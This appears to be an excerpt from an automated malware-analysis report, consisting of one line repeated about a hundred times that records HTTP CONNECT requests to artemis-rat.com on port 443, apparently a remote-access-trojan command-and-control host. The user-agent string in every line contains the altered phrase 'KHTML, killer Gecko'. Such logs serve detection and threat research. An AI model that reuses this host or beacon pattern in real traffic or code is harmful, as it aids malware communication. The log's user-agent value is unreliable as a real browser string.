                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
